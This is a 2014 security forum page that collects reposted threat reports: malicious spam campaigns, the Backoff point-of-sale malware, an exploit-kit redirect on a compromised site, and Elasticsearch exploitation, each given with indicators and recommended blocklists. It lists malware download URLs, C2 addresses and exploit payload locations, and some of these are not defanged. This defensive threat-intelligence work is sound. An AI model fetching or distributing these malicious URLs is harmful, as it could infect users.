News: Cexx forums, with volunteers dedicated to helping you remove malware and stay protected
 
Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
August 01, 2014, 07:53:22
Pages: [1] 2 3 ... 10
 1 
 on: Today at 02:48:46 
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Fake NatWest SPAM - uses goo.gl links to spread malware
- http://blog.dynamoo.com/2014/08/natwest-you-have-new-secure-message.html
1 Aug 2014 - "This fake NatWest bank message uses the Goo.gl URL shortener to spread malware:

Screenshot: https://2.bp.blogspot.com/-KGgo-AsFrI8/U9tjUZWdXOI/AAAAAAAADdg/yg3nw8reghk/s1600/natwest.png

The link in the email goes to goo .gl/dGDi7l and the downloads a ZIP file from berkleyequine .com/wp-includes/images/Documents-43632.zip, containing a malicious executable Documents-43632.scr which has a VirusTotal detection rate of just 1/54*. The CAMAS** report shows that the malware calls out to the following URLs;
94.23.247.202 /0108uk1/SANDBOXA/0/51-SP2/0/
94.23.247.202 /0108uk1/SANDBOXA/1/0/0/
94.23.247.202 /0108hk1/SANDBOXA/1/0/0/
94.23.247.202 /0108ok1/SANDBOXA/1/0/0/
acanthe .be/css/01u1.rar
dirbeen .com/misc/01u1.rar
porfintengoweb .com/css/heap_61_id3.rar
sso-unidadfinanzas .com/images/heap_61_id3.rar
theothersmag .com/covers/opened.rar
firstfiresystems.com/css/slimbox/opened.rar
The characteristics of this malware are very similar to this one seen yesterday***, and you can be assured that there are other goo .gl URLs and download locations in addition to the one listed here... Google don't make it easy to report spammy links and they are awfully slow to respond to reports, but their reporting form is at goo.gl/spam-report if you want to try it...
Recommended blocklist:
94.23.247.202
acanthe .be
dirbeen .com
porfintengoweb .com
sso-unidadfinanzas .com
theothersmag .com
firstfiresystems .com
berkleyequine .com
"
* https://www.virustotal.com/en-gb/file/5942b89dc3b40cf47cb736cb20909489182d3cef6c20a183c25d38adb8372e48/analysis/1406886192/

** http://camas.comodo.com/cgi-bin/submit?file=5942b89dc3b40cf47cb736cb20909489182d3cef6c20a183c25d38adb8372e48

*** http://blog.dynamoo.com/2014/07/new-fax-spam-using-googl-shortening.html

94.23.247.202: https://www.virustotal.com/en/ip-address/94.23.247.202/information/
___

Fake NYC Homicide Suspect SPAM - using goo .gl shortener to spread malware
- http://blog.dynamoo.com/2014/08/new-york-city-police-homicide-suspect.html
1 Aug 2014 - "... This spam is slightly unusual..
   From:     ALERT @nyc .gov [ALERT@ static-23-106-230-77.ipcom.comunitel .net]
    Date:     1 August 2014 10:43
    Subject:     Homicide Suspect
    Bulletin Headline: HOMICIDE SUSPECT
    Sending Agency: New York City Police
    Sending Location: NY - New York - New York City Police
    Bulletin Case#: 14-10078
    Bulletin Author: BARILLAS #9075
    Sending User #: 94265
    APBnet Version: 287320
    The bulletin is a pdf file. To download please follow the link below (Google Disk Drive service):
    https ://goo .gl/RwNKEA ...


The link in the email is goo .gl/RwNKEA which goes to unionlawgroup .com/wp-content/images/Documents-43632.zip which is exactly the same payload as used in this spam*...
Blocking unionlawgroup .com is probably a good idea."
* http://blog.dynamoo.com/2014/08/natwest-you-have-new-secure-message.html

50.63.221.1: https://www.virustotal.com/en/ip-address/50.63.221.1/information/
___

Fake Googlebots increasingly used to launch DDoS Attacks
- http://atlas.arbor.net/briefs/index#683046610
Elevated Severity
31 Jul 2014 - "Spoofed Googlebots, Google's search bot software, are increasingly being used to launch application-layer DDoS attacks.
Analysis: The fake Googlebots have also been observed scraping sites, sending spam, and hacking as well. These bots could prove an effective tool, as even well-protected companies with appropriate blocking rules still allow for Google. However, the fake Googlebots are easily identified, as legitimate Googlebots come from a predetermined IP address range. [ http://threatpost.com/phony-googlebots-becoming-a-real-ddos-attack-tool/107317 ] "

 Evil or Very Mad  Sad

 2 
 on: July 31, 2014, 15:52:06  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Wireshark 1.12.0
- https://www.wireshark.org/download.html
31 Jul 2014 - "The current stable release of Wireshark is 1.12.0. It supersedes all previous releases..."

1.12.0 Release Notes
- https://www.wireshark.org/docs/relnotes/wireshark-1.12.0.html

Bug Fixes
- https://www.wireshark.org/docs/relnotes/wireshark-1.12.0.html#_bug_fixes

- https://www.wireshark.org/lists/wireshark-announce/201407/msg00001.html
___

Wireshark 1.10.9
- https://www.wireshark.org/lists/wireshark-announce/201407/msg00002.html
31 Jul 2014

1.10.9 Release Notes
- https://www.wireshark.org/docs/relnotes/wireshark-1.10.9.html

Bug Fixes
- https://www.wireshark.org/docs/relnotes/wireshark-1.10.9.html#_bug_fixes

- https://www.wireshark.org/security/

 Exclamation Exclamation

 3 
 on: July 31, 2014, 09:18:20  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Fake "New fax" SPAM - using goo .gl shortening service
- http://blog.dynamoo.com/2014/07/new-fax-spam-using-googl-shortening.html
31 July 2014 - "Here are a couple of variations of a fax -spam- using the goo .gl shortening service:
   From:     Fax [fax@ victimdomain]
    Date:     31 July 2014 11:23
    Subject:     You've received a new fax
    New fax at SCAN5735232 from EPSON by https ://victimdomain
    Scan date: Thu, 31 Jul 2014 19:23:11 +0900
    Number of pages: 2
    Resolution: 400x400 DPI
    You can download your fax message at:
    https ://goo.gl /1rBYjl
    (Google Disk Drive is a file hosting service operated by Google, Inc.)
    ------------------------------
    From:     FAX [fax@ qcom .co.uk]
    Reply-to:     FAX [fax@ qcom .co.uk]
     fax@ localhost
    Date:     31 July 2014 10:53
    Subject:     You have received a new fax message
    You have received fax from EPS76185555 at victimdomain
    Scan date: Thu, 31 Jul 2014 16:53:10 +0700
    Number of page(s): 2
    Resolution: 400x400 DPI
    Download file at google disk drive service - dropbox.
    https ://goo .gl/t8jteI ...


There seems to be an uptick of goo.gl spam.. if you receive something like this you can report it to goo.gl/spam-report as malware... I've seen three different URLs... Obviously, this is a ZIP file. It contains a malicious executable Document-95722.scr which has a VirusTotal detection rate of just 1/54*. The CAMAS report** shows that the malware reaches out to the following locations to download further components:
andribus .com/images/images.rar
owenscrandall .com/images/images.rar
Incidentally, if you add a "+" to the end of the goo.gl URL you can see how many people have clicked through. For example:
> https://1.bp.blogspot.com/-XGnNezE_8BI/U9on1yFs3VI/AAAAAAAADdQ/LReRBZvJpFQ/s1600/goo-gl.png
164 clicks isn't a lot, but there are multiple URLs in use.
Recommended blocklist:
andribus .com
owenscrandall .com
esys-comm .ro
autoescuelajoaquin .com
pinkfeatherproductions .com
"
* https://www.virustotal.com/en-gb/file/503d73e26e0c92469ffb70da26d323da0c266a2b3efe90114f61c27883e995cc/analysis/1406804074/

** http://camas.comodo.com/cgi-bin/submit?file=503d73e26e0c92469ffb70da26d323da0c266a2b3efe90114f61c27883e995cc
___

Fake Evernote "File has been sent" SPAM
- http://blog.dynamoo.com/2014/07/evernote-file-has-been-sent-spam.html
31 July 2014 - "I've never understood Evernote. Something to do with elephants I think. But this spam isn't from them anyway..
   Date:      Thu, 31 Jul 2014 12:26:53 +0200 [06:26:53 EDT]
    From:      EVERNOTE [lcresknpwz@ business .telecomitalia .it]
    Subject:      File has been sent [redacted]
    DSC_9426679.jpg attached to the letter
    Copyright 2014 Evernote Corporation. All rights reserved


The file attached is actually DSC_9426679.zip and not .jpg, containing a malicious executable DSC_8832966.exe with a VirusTotal detection rate of 7/53*. The CAMAS report** shows that the malware attempts to download an additional component... These download locations are the same as yesterday's Amazon spam run***. The downloaded file has a VT detection rate of 3/53****. The recommended blocklist is the same as yesterday."
* https://www.virustotal.com/en-gb/file/0b875692701e0b4cdaa82068c2bca8d9f7de7f1d0154cbaaaefb5316d1a785dd/analysis/1406813029/

** http://camas.comodo.com/cgi-bin/submit?file=0b875692701e0b4cdaa82068c2bca8d9f7de7f1d0154cbaaaefb5316d1a785dd

*** http://blog.dynamoo.com/2014/07/amazoncouk-your-amazon-order-spam_30.html

**** https://www.virustotal.com/en-gb/file/b6eb2c5b907cc5fb1092701d33caea52a0ed8171bc2f2d83cdd2b89deb120366/analysis/1406813571/
___

ADP Payroll Spam
- http://threattrack.tumblr.com/post/93406211803/adp-payroll-spam
Juky 31, 2014 - "Subjects Seen:
   ACH Notification
Typical e-mail details:
   Attached is a summary of Origination activity for 07/31/2014
    Download it from Google Disk Drive Inc.:
    goo .gl/mp4Vh3
    If you need assistance please contact us via e-mail during regular business hours.
    Thank you for your cooperation.


Malicious URLs:
    espressomachinesinfo .com/wp-includes/images/Document-83265.zip
Malicious File Name and MD5:
    Document-83265.scr (3603D5B08D83130414B264FAF3EE41E1)


Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/3aa710526c0cf4022eb030bd44f2491f/tumblr_inline_n9kz19SPvX1r6pupn.png

Tagged: ADP, Upatre

72.29.66.41: https://www.virustotal.com/en-gb/ip-address/72.29.66.41/information/
___

Fake Xerox WorkCentre SPAM
- http://blog.dynamoo.com/2014/07/scanned-image-from-xerox-workcentre-spam.html
31 July 2014 - "This is a thoroughly old school spam with a malicious attachment.
    Date:      Thu, 31 Jul 2014 18:16:08 +0000 [14:16:08 EDT]
    From:      Local Scan [scan.614@ victimdomain]
    Subject:      Scanned Image from a Xerox WorkCentre
    You have a received a new image from Xerox WorkCentre.
    Sent by: victimdomain
    Number of Images: 5
    Attachment File Type: ZIP [PDF]
    WorkCentre Pro Location: Machine location not set
    Device Name: victimdomain
    Attached file is scanned image in PDF format...


Guess what.. it isn't an image at all, but a ZIP file with the unusual name of Image_[_var=partorderb].zip which contain a malicious executable Image_07312014.scr, scoring a measly 1/54* at VirusTotal. The Comodo CAMAS report** shows that the malware downloads components... There are some further clues in the VirusTotal comments* as to what the malware does. Sophos has also seen the 94.23.247.202 (OVH, France) IP before***.
Recommended blocklist:
94.23.247.202
globe-runners .com
lucantaru .it
mediamaster-2000 .de
ig-engenharia .com
upscalebeauty .com
lagrimas.tuars .com
"
* https://www.virustotal.com/en-gb/file/beff9a8e4d9ddd5766cd66fdbfda40c7935900a035cb6681d0dc468affa02a7a/analysis/1406832159/

** http://camas.comodo.com/cgi-bin/submit?file=beff9a8e4d9ddd5766cd66fdbfda40c7935900a035cb6681d0dc468affa02a7a

*** http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Agent-AHXK/detailed-analysis.aspx

94.23.247.202: https://www.virustotal.com/en-gb/ip-address/94.23.247.202/information/

 Evil or Very Mad  Shocked  Sad

 4 
 on: July 31, 2014, 06:33:52  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Backoff... Malware
Backoff Point-of-Sale Malware
- https://www.us-cert.gov/ncas/alerts/TA14-212A
July 31, 2014 - "... malicious actors are using publicly available tools to locate businesses that use remote desktop applications. Remote desktop solutions like Microsoft's Remote Desktop [1] Apple Remote Desktop,[2] Chrome Remote Desktop,[3] Splashtop 2,[4] Pulseway[5], and LogMEIn Join.Me[6] offer the convenience and efficiency of connecting to a computer from a remote location. Once these applications are located, the suspects attempted to brute force the login feature of the remote desktop solution. After gaining access to what was often administrator or privileged access accounts, the suspects were then able to deploy the point-of-sale (PoS) malware and subsequently exfiltrate consumer payment data via an encrypted POST request. USSS, NCCIC/US-CERT and Trustwave Spiderlabs have been working together to characterize newly identified malware dubbed "Backoff", associated with several PoS data breach investigations. At the time of discovery and analysis, the malware variants had low to -zero- percent anti-virus detection rates, which means that fully updated anti-virus engines on fully patched computers could -not- identify the malware as -malicious- ..."
Description: “Backoff” is a family of PoS malware and has been discovered recently. The malware family has been witnessed on at least three separate forensic investigations. Researchers have identified three primary variants to the “Backoff” malware including 1.4, 1.55 (“backoff”, “goo”, “MAY”, “net”), and 1.56 (“LAST”). These variations have been seen as far back as October 2013 and continue to operate as of July 2014. In total, the malware typically consists of the following four capabilities. An exception is the earliest witnessed variant (1.4) which does not include keylogging functionality. Additionally, 1.55 ‘net’ removed the explorer.exe injection component:
- Scraping memory for track data
- Logging keystrokes
- Command & control (C2) communication
- Injecting -malicious- stub into explorer.exe
The malicious stub that is -injected- into explorer.exe is responsible for persistence in the event the malicious executable crashes or is forcefully stopped. The malware is responsible for scraping memory from running processes on the victim machine and searching for track data. Keylogging functionality is also present in most recent variants of “Backoff”. Additionally, the malware has a C2 component that is responsible for uploading discovered data, updating the malware, downloading/executing further malware, and uninstalling the malware.
Impact: The impact of a compromised PoS system can affect both the businesses and consumer by exposing customer data such as names, mailing addresses, credit/debit card numbers, phone numbers, and e-mail addresses to criminal elements. These breaches can impact a business’ brand and reputation, while consumers’ information can be used to make fraudulent purchases or risk compromise of bank accounts. It is critical to safeguard your corporate networks and web servers to prevent any unnecessary exposure to compromise or to mitigate any damage that could be occurring now.
Solution: At the time this advisory is released, the variants of the “Backoff’ malware family are largely -undetected- by anti-virus (AV) vendors. However, shortly following the publication of this technical analysis, AV companies will quickly begin detecting the existing variants. It’s important to maintain up-to-date AV signatures and engines as new threats such as this are continually being added to your AV solution...

(More detail at the us-cert URL above.)

 Evil or Very Mad Evil or Very Mad  Shocked

 5 
 on: July 30, 2014, 17:30:34  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Microsoft Security Advisory 2915720
Changes in Windows Authenticode Signature Verification
- https://technet.microsoft.com/en-us/library/security/2915720
December 10, 2013 | Updated: July 29, 2014 - "... This advisory was revised on July 29, 2014 to announce that the stricter Windows Authenticode signature verification behavior described here will be enabled on an opt-in basis and not made a default behavior in supported releases of Microsoft Windows..."
V1.4 (July 29, 2014): Revised advisory to announce that Microsoft no longer plans to enforce the stricter verification behavior as a default functionality on supported releases of Microsoft Windows. It remains available as an opt-in feature. See the Advisory FAQ section for more information.

 Exclamation

 6 
 on: July 30, 2014, 01:42:46  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Fake 'documents ready for download' SPAM – PDF malware
- http://myonlinesecurity.co.uk/documents-ready-download-fake-pdf-malware/
30 July 2014 - "Your documents are ready for download is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
Your documents 6419165973846 are ready , please sign them and email them back.
Thank you
John Garret
Level III Account Management
817-768-8742 office
817-874-8795 cell
johngarret@ natwest .com
Investments in securities and insurance products are:
NOT FDIC-INSURED/NO BANK-GUARANTEES/MAY LOSE VALUE
The security of personal information about you is our priority. We protect this information by maintaining physical, electronic, and procedural safeguards that meet applicable law. We train our employees in the proper handling of personal information. When we use other companies to provide services for us, we require them to protect the confidentiality of personal information they receive...


30 July 2014: Documents_3922929617733.rar (10 kb) : Extracts to Documents.scr
Current Virus total detections: 2/53* . This Your documents are ready for download is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/634d23123e3e3c1c5ef4f20be53b81541fc21a77a9fcd73f383917eaeade8ed9/analysis/1406710734/
___

Fake "Amazon order" SPAM
- http://blog.dynamoo.com/2014/07/amazoncouk-your-amazon-order-spam_30.html
30 July 2014 - "Another -fake- Amazon spam with a malicious payload:

Screenshot: https://4.bp.blogspot.com/-zOkh76LGgdk/U9j-Nnjd49I/AAAAAAAADcY/wGaN7utyHfg/s1600/amazon4.png

There's a ZIP file attached (in this case Order-853-9908013-4362599.zip) which unzips to a folder Order details with a malicious file ORDER-992-5188991-000933.exe which has a VirusTotal detection rate of 9/53*. The Comodo CAMAS report** shows that it downloads a further component...
This second executable has a VT detection rate of 5/54***..."
(Long recommended blocklist at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/file/7465f6690f1b4e1c80e0f281241b33a643d6deb4986a791a8d35633ec2b7f226/analysis/1406729013/

** http://camas.comodo.com/cgi-bin/submit?file=7465f6690f1b4e1c80e0f281241b33a643d6deb4986a791a8d35633ec2b7f226

*** https://www.virustotal.com/en-gb/file/0836b9070a5c99a36d8e68438358f4e56d42555eff78d442f06e63f2f381779c/analysis/1406729311/
___

Fake Order status 30.07.2014.xls – XLS malware
- http://myonlinesecurity.co.uk/order-status-540130-30-07-2014-xls-fake-xls-malware/
30 July 2014 - "Order status -540130 30.07.2014.xls is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... An email received coming from a -random- name with -no- company details and a totally blank body and a subject of  Order status -540130 30.07.2014.xls ( different order numbers ) with a zip attachment
30 July 2014 : 540130-30.07.2014.zip ( 47 kb) : Extracts to   order-8301138-30.07.2014.xls.exe
Current Virus total detections: 9/54* . This  Order status -540130 30.07.2014.xls  is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Excel spreadsheet file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/c05513fab83c7080dbe7ccf7b8cb4cca506771cc0fb378ab085398cd7c33ec50/analysis/1406736903/
___

Fake "Payslip" SPAM
- http://blog.dynamoo.com/2014/07/payslip-spam.html
30 July 2014 - "...  terseness works with this kind of message:
    From:     Richard Mason [richardm254@ gmail .com]
    Date:     30 July 2014 21:23
    Subject:     Payslip
    Please find attached the payment slip.
Attached is a file swift copy-Payment-Slip-$70,000.html which when it is opened up in your browser comes up with a popup box.

> https://3.bp.blogspot.com/-G4xRic3PZb4/U9liJUQc5lI/AAAAAAAADco/eFJZQpx9YJI/s1600/js.png

Clicking OK downloads an executable from www.greenexpress .ge/swift//payslip.exe which you are presumably meant to run. It's a bit of an odd way to do it, so perhaps there's a reason. The HTML is simple enough..
> https://3.bp.blogspot.com/-TfUbI6lM0Sw/U9lmBNjobKI/AAAAAAAADc8/0F3omwn40kk/s1600/js2.png
..but why bother doing it this way at all? Well, it makes it just a bit harder for email security software to find the link because the attachment is Base 64 encoded... The malware itself has a VirusTotal detection rate of 31/53*... Automated analysis tools seem to time out or crash, which indicates that the malware is hardened against analysis, but the VT report does see traffic with a pattern that might be blockable if you have a webfilter..."
* https://www.virustotal.com/en-gb/file/2ce9a7e9422e6c105281effc01fb3f0141e10cc32a62efff0b20b4b6d4ceec84/analysis/1406754444/

198.50.169.4: https://www.virustotal.com/en-gb/ip-address/198.50.169.4/information/
___

New Crypto-Ransomware in the wild
- http://blog.trendmicro.com/trendlabs-security-intelligence/new-crypto-ransomware-emerge-in-the-wild/
July 30, 2014 - "... new crypto-ransomware variants that use new methods of encryption and evasion... 'Cryptoblocker' will not drop any text files instructing the victim on how to decrypt the files. Rather, it displays the dialog box below. Entering a transaction ID in the text box will trigger a message stating that the “transaction was sent and will be verified soon.”:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/07/cryptob1.jpg
... This malware does not use CryptoAPIs, a marked difference from other ransomware. CryptoAPIs are used to make RSA keys, which were not used with this particular malware. This is an interesting detail considering RSA keys would make decrypting files more difficult. Instead, we found that  the advanced encryption standard (AES) is found in the malware code. A closer look also reveals that the compiler notes were still intact upon unpacking the code... Based on feedback from the Trend Micro Smart Protection Network, the US is the top affected country, followed by France and Japan. Spain and Italy round up the top five affected countries.
Countries affected by Cryptoblocker:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/07/Cryptolocker-Infection-01.jpg
... These ransomware variants prove that despite significant takedowns, cybercriminals will continue to find ways to victimize users. Users should remain cautious when dealing with unfamiliar files, emails, or URL links. While it might be tempting to pay the ransom for encrypted files, there is no guarantee that the cybercriminals will decrypt the ransomed files..."

 Evil or Very Mad  Sad

 7 
 on: July 29, 2014, 11:32:18  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

SocialBlade .com compromised - redirection chain to Nuclear Pack exploit kit
- http://blog.malwarebytes.org/exploits-2/2014/07/socialblade-com-compromised-starts-redirection-chain-to-nuclear-pack-exploit-kit/
July 29, 2014 - "...  the YouTube stats tracker site SocialBlade .com is connected with malicious redirections that also lead to the Nuclear Pack EK.
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/07/socialblade2.png
The drive-by download which was detected by our honeypots is successfully blocked by Malwarebytes Anti-Exploit. According to site tracker SimilarWeb, SocialBlade .com has a global rank of 5,791 and had around 3.6 million visits last month... Typically we’d see an iframe and we would be able to search for it by its string. This was not the case here, so we had to manually inspect each web session and external references. The intruder was in a core JavaScript file... the JavaScript code writes the iframe and launches the redirection workflow... Java exploit (CVE-2013-2465?):
hxxp ://50d88d1ad05y.correctzoom .uni.me/1406197380.jar
VT (4/52*)* https://www.virustotal.com/en/file/f0641b46121c7fa32e58904b4cc6a0b2c220253a61cf23a0aa26f26d045279e5/analysis/1406296526/
Internet Explorer exploit (CVE ?):
hxxp ://50d88d1ad05y.correctzoom .uni.me/1406197380.htm
VT (0/53**)
** https://www.virustotal.com/en/file/7f6906b5d52b4133b97e3ccb192ea0d46c3ef79b024bfd3ccaff9f0eed2ae651/analysis/
Payload:
hxxp ://50d88d1ad05y.correctzoom .uni.me/f/1406197380/7
VT (17/52***)
*** https://www.virustotal.com/en/file/da3857d5496c3982222c330bd3d711bbe21d325da094050772b29838edf01e20/analysis/1406311279/
...  most likely leads to ad-fraud related malware (clickjacking etc.). We have notified the owners of SocialBlade .com so they can fix the issue ASAP and prevent unnecessary malware infections..."

uni .me: 192.95.12.33: https://www.virustotal.com/en-gb/ip-address/192.95.12.33/information/

- https://www.google.com/safebrowsing/diagnostic?site=AS:16276

 Evil or Very Mad Evil or Very Mad  Sad

 8 
 on: July 29, 2014, 07:07:37  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Something evil on 31.210.96.155, ...156, ...157 and ...158 (31.210.96.152/29)
- http://blog.dynamoo.com/2014/07/something-evil-on-3121096155-3121096156.html
29 July 2014 - "I don't know quite what the exploit kit of the month is here, but the IP addresses 31.210.96.155, 31.210.96.156, 31.210.96.157 and 31.210.96.158 are currently serving up malware using -hijacked- GoDaddy domains, and are targeting victim websites by altering their .htaccess files** to intercept traffic coming from search engines such as Google. These IP addresses have been used for malware for some time*...VirusTotal reports for these IPs are pretty poor [1] [2] [3] [4]. I assume that they form part of an allocation 31.210.96.152/29 which I would very strongly recommend blocking that range... these appear to be subdomains of -hijacked- GoDaddy domains... I would recommend permablocking the following IP range and temporarily blocking the following domains:
31.210.96.152/29 ..."
(Long list at the dynamoo URL above.)
* http://c-apt-ure.blogspot.co.uk/2014/06/two-years-later.html

** http://www.symantec.com/connect/blogs/trojanmilicenso-infection-through-htaccess-redirection

1] 31.210.96.155: https://www.virustotal.com/en-gb/ip-address/31.210.96.155/information/
2] 31.210.96.156: https://www.virustotal.com/en-gb/ip-address/31.210.96.156/information/
3] 31.210.96.157: https://www.virustotal.com/en-gb/ip-address/31.210.96.157/information/
4] 31.210.96.158: https://www.virustotal.com/en-gb/ip-address/31.210.96.158/information/

 Evil or Very Mad Evil or Very Mad  Sad

 9 
 on: July 29, 2014, 02:01:58  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

malvertising, fiesta, magnitude, zegost domains
- http://www.malwaredomains.com/?p=3639
July 28th, 2014 - "Added domains associated with Rig EK, Fiesta EK, zegost.b, Nuclear EK, malvertising, and other badness. Sources: malware-traffic-analysis.net, isc.sans.org, google.com/safebrowsing, sitecheck.sucuri.net and others..."

 Exclamation

 10 
 on: July 28, 2014, 16:09:07  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Amazon cloud attackers install DDoS bots ...
Attackers are targeting Amazon EC2 instances with Elasticsearch 1.1.x installed
- https://www.computerworld.com/s/article/9249991/Attackers_install_DDoS_bots_on_Amazon_cloud_exploit_Elasticsearch_weakness
July 28, 2014 - "Attackers are exploiting a vulnerability in distributed search engine software Elasticsearch to install DDoS malware on Amazon and possibly other cloud servers. Elasticsearch is an increasingly popular open-source search engine server developed in Java that allows applications to perform full-text search for various types of documents through a REST API (representational state transfer application programming interface). Because it has a distributed architecture that allows for multiple nodes, Elasticsearch is commonly used in cloud environments. It can be deployed on Amazon Elastic Compute Cloud (EC2), Microsoft Azure, Google Compute Engine and other cloud platforms. Versions 1.1.x of Elasticsearch have support for active scripting through API calls in their default configuration. This feature poses a security risk because it doesn't require authentication and the script code is -not- sandboxed. Security researchers reported earlier this year that attackers can exploit Elasticsearch's scripting capability to execute arbitrary code on the underlying server, the issue being tracked as CVE-2014-3120* in the Common Vulnerabilities and Exposures (CVE) database. Elasticsearch's developers haven't released a patch for the 1.1.x branch, but starting with version 1.2.0, released on May 22, dynamic scripting is disabled by default. Last week security researchers from Kaspersky Lab** found new variants of Mayday, a Trojan program for Linux that's used to launch distributed denial-of-service (DDoS) attacks. The malware supports several DDoS techniques, including DNS amplification. One of the new Mayday variants was found running on compromised Amazon EC2 server instances, but this is not the only platform being misused... Users of Elasticsearch 1.1.x should upgrade to a newer version and those who require the scripting functionality should follow the security recommendations made by the software's developers in a blog post*** on July 9."

* https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3120 - 6.8

- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4326 - 7.5 (HIGH)

- http://www.elasticsearch.org/blog/logstash-1-4-2/
Jun 24
Changelog for 1.4.2
- https://github.com/elasticsearch/logstash/blob/master/CHANGELOG

** https://securelist.com/blog/virus-watch/65192/elasticsearch-vuln-abuse-on-amazon-cloud-and-more-for-ddos-and-profit/

*** http://www.elasticsearch.org/blog/scripting-security/

- https://www.found.no/foundation/elasticsearch-security/#staying-safe-while-developing-with-elasticsearch

Insecure default in Elasticsearch enables remote code execution
- http://bouk.co/blog/elasticsearch-rce/
May 2014 - "... How to secure against this vulnerability..."
___

>> http://www.rapid7.com/db/modules/exploit/multi/elasticsearch/script_mvel_rce
___

- http://atlas.arbor.net/briefs/index#-961013762
High Severity
31 Jul 2014

 Evil or Very Mad Evil or Very Mad  Sad

Pages: [1] 2 3 ... 10
Powered by SMF 1.1.19 | SMF © 2013, Simple Machines Page created in 0.305 seconds with 16 queries.